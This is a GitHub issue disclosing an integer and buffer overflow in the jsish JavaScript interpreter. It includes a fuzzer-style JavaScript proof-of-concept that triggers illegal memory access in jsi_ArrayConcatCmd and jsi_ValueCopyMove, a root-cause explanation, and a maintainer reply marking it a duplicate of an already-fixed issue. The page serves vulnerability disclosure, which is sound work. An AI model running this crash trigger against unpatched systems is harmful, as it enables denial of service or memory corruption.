Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

integer overflow and buffer overflow #9

Closed
bird8693 opened this issue Apr 13, 2020 · 1 comment
Closed

integer overflow and buffer overflow #9

bird8693 opened this issue Apr 13, 2020 · 1 comment

Comments

@bird8693
Copy link

Enviroment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1

poc:

var o = [
    1,
    2
];
o.length = ~-4294967297;
var Shek = o.concat(o, o, o);
var ytbj = JSON.stringify('TrT{IlX88;Pc&6KbA$5dJn');
o = o.concat(o, o, o);
var Pcmm = o.reduce(function () {
}, o.length);
var Xtjk = o.concat(o, o, o);
Xtjk = o.concat(o, o, o);
Shek = Shek.forEach(function () {
}, o.length);
var HxDr = 759250124 == o.length;
var mscw = JSON.stringify(' ÌDDú\x05jr\xB3\x0F\x13R\x0FB7\xA9\xA3G\xA0\x16');
var KGeW = new WeakSet([
    [3.1589793],
    []
]);
var KhcQ = new Map([
    [],
    [
        o.length,
        o.length,
        -2147483648
    ]
]);
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e 308);
var rbQB = o.forEach(function () {
}, o);
var a = Object.keys(o);
var APSB = -9007199254740990 != a.length;

vulnerability description:

The vulnerable code is on line src / jsiValue.c 261, the functionc jsi_ValueCopyMove, the affected code is as follows:
image
The address pointed by from is illegal, that is, illegal memory access.

reason

In the process of parsing js, when encountering the contact function of js, jsish will call the parsing function jsi_ArrayConcatCmd
image

The curlen here is obtained by Jsi_ObjGetLength, as shown in the figure:

image
But curlen can be changed at will, and the for loop of src / jsiArray.c 323 is not verified, it is easy to cross the boundary. In addition, the for loop calls the Jsi_ValueDup2 function, so that you can copy the content beyond the boundary.
@pcmacdon
Copy link
Owner

Also a duplicate, or more accurately was fixed in issue #5.

This was referenced Oct 20, 2020
Open
Closed
Closed
Closed
Closed
Closed
Closed
This was referenced Oct 31, 2020
Closed
Closed
Closed
@pcmacdon pcmacdon mentioned this issue Jan 20, 2024
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@bird8693 @pcmacdon